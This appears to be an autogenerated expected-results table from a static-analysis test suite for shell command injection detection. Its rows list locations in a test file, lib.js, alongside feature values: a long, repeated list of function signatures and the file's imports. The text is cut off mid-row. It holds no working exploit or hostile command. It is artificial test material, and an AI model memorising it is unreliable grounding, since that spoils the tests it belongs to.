Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:0 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | asyncExec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | asyncExec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | asyncExec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | boundProblem | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | boundProblem | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | boundProblem | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | build | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | build | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | build | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | cleanInput | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | cleanInput | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | cleanInput | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | fs | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | fs | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | fs | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | id | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | id | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | id | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | path | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | path | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | path | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | require | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | require | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | sanitizeShellString | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | sanitizeShellString | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | sanitizeShellString | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | spawn | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | spawn | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | spawn | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | util | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | util | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | util | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | yetAnohterSanitizer | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | yetAnohterSanitizer | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:1:1:1 | yetAnohterSanitizer | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:5:1:6 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:5:1:6 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:5:1:6 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:5:1:6 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:5:1:33 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:5:1:33 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:5:1:33 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:1:5:1:33 | cp = re ... ocess") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 